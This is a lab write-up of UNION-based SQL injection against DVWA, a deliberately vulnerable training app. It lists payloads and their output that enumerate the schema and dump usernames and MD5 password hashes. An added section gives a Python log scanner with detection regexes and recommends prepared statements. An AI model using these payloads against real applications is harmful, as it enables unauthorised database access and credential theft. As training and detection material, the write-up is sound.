Oh! JUN
[DVWA] SQL INJECTION Practice (Low Level)
1. Vulnerability analysis
| INPUT | OUTPUT | Note |
|---|---|---|
| ' | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 | Syntax error occurs (this shows that a MySQL DB is in use) |
| 1 | ID: 1 First name: admin Surname: admin | First name and Surname for ID 1 are output normally |
| 2 | ID: 2 First name: Gordon Surname: Brown | First name and Surname for ID 2 are output normally |
| 2-1 | ID: 2-1 First name: Gordon Surname: Brown | 2-1 is not calculated; it appears to be treated as a string |
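2. Identifying the DBMS
- The error message seen during the vulnerability analysis confirms that the DBMS is MySQL.
3. Data retrieval attack
- Entering a User ID changes First name and Surname according to the ID value.
- In other words, DB data is output to the web page.
- Next, a UNION-based attack is attempted.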
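4. UNION-BASED
| INPUT | Result |
|---|---|
| ' order by 1# | Normal output |
| ' order by 2# | Normal output |
| ' order by 3# | Error |
| ' order by 4# | Error |
| ' order by 5# | Error |

- ORDER BY 1 and 2 succeed and ORDER BY 3 fails, so the query returns two columns.
- Confirmed that 'a' and 'b' are output normally on the web page.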
5. Enumeration
| DATABASE | | |
|---|---|---|
| ' and 1=2 union all select database(), 'b'# | ID: ' and 1=2 union all select database(), 'b'# First name: dvwa Surname: b | DB name confirmed as 'dvwa' |

| TABLE | | |
|---|---|---|
| ' and 1=2 union all select (select count(*) from information_schema.tables where table_schema='dvwa'), 'b'# | ID: ' and 1=2 union all select (select count(*) from information_schema.tables where table_schema='dvwa'), 'b'# First name: 2 Surname: b | Number of tables |
| ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 0,1), 'b'# | ID: ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 0,1), 'b'# First name: guestbook Surname: b | Table name |
| ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 1,1), 'b'# | ID: ' and 1=2 union all select (select table_name from information_schema.tables where table_schema='dvwa' limit 1,1), 'b'# First name: users Surname: b | Table name |

| COLUMN | | |
|---|---|---|
| ' and 1=2 union all select (select count(*) from information_schema.columns where table_schema='dvwa' and table_name='users'), 'b'# | ID: ' and 1=2 union all select (select count(*) from information_schema.columns where table_schema='dvwa' and table_name='users'), 'b'# First name: 6 Surname: b | Number of columns |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1), 'b'# First name: user_id Surname: b | Column name |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1), 'b'# First name: first_name Surname: b | Column name |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1), 'b'# First name: last_name Surname: b | Column name |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1), 'b'# First name: user Surname: b | Column name |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1), 'b'# First name: password Surname: b | Column name |
| ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1), 'b'# | ID: ' and 1=2 union all select (select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1), 'b'# First name: avatar Surname: b | Column name |

| DATA | | |
|---|---|---|
| ' and 1=2 union all select (select count(*) from dvwa.users), 'b'# | ID: ' and 1=2 union all select (select count(*) from dvwa.users), 'b'# First name: 5 Surname: b | Number of data rows |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 0,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 0,1), null# First name: 1###admin###admin###admin###5f4dcc3b5aa765d61d8327deb882cf99### Surname | Data contents |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 1,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 1,1), null# First name: 2###Gordon###Brown###gordonb###e99a18c428cb38d5f260853678922e03### Surname | Data contents |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 2,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 2,1), null# First name: 3###Hack###Me###1337###8d3533d75ae2c3966d7e0d4fcc69216b### Surname: | Data contents |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 3,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 3,1), null# First name: 4###Pablo###Picasso###pablo###0d107d09f5bbe40cade3de5c71e9e9b7### Surname: | Data contents |
| ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 4,1), null# | ID: ' and 1=2 union all select (select concat(user_id, '###', first_name, '###', last_name, '###', user, '###', password, '###') from dvwa.users limit 4,1), null# First name: 5###Bob###Smith###smithy###5f4dcc3b5aa765d61d8327deb882cf99### Surname: | Data contents |
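
From the defender's side, the inputs used in sections 1, 4 and 5 leave a recognisable trail in web server logs. The following is an added example, not part of the original post: it decodes the `id` parameter from access-log lines and tags each stage of the walkthrough. The log format, client address, request path and the `id` parameter name are assumptions, and the log lines are constructed around inputs quoted on this page.

```python
import re
from urllib.parse import parse_qs, quote_plus, urlsplit

# Rules run on the decoded "id" value, which should only ever be an integer.
RULES = {
    "non_numeric_id": re.compile(r"\D"),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "row_stepping": re.compile(r"\blimit\s+\d+\s*,\s*1\b", re.I),
    "trailing_comment": re.compile(r"(?:#|--\s?)\s*$"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # assumed log format

def classify(value):
    """Names of every rule that matches one decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def scan(lines, param="id"):
    """Return (client, decoded value, matched rules) for each flagged request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            hits = classify(value)
            if hits:
                findings.append((client, value, hits))
    return findings

# Inputs quoted from this page; the log lines wrapped around them are constructed.
PAGE_INPUTS = [
    "1", "2-1", "'", "' order by 3#",
    "' and 1=2 union all select database(), 'b'#",
    "' and 1=2 union all select (select table_name from information_schema.tables"
    " where table_schema='dvwa' limit 0,1), 'b'#",
]

def sample_log(path="/vulnerabilities/sqli/"):  # request path is an assumption
    prefix = '10.0.0.5 - - [13/Sep/2022:10:00:00 +0900] "GET '
    return [f'{prefix}{path}?id={quote_plus(v)}&Submit=Submit HTTP/1.1" 200 4321'
            for v in PAGE_INPUTS]

if __name__ == "__main__":
    for client, value, hits in scan(sample_log()):
        print(client, ",".join(hits), "<-", value[:50])
```

Signatures like these only surface probing after the fact. The flaw itself is closed by binding `id` as an integer parameter in a prepared statement instead of concatenating it into the query string.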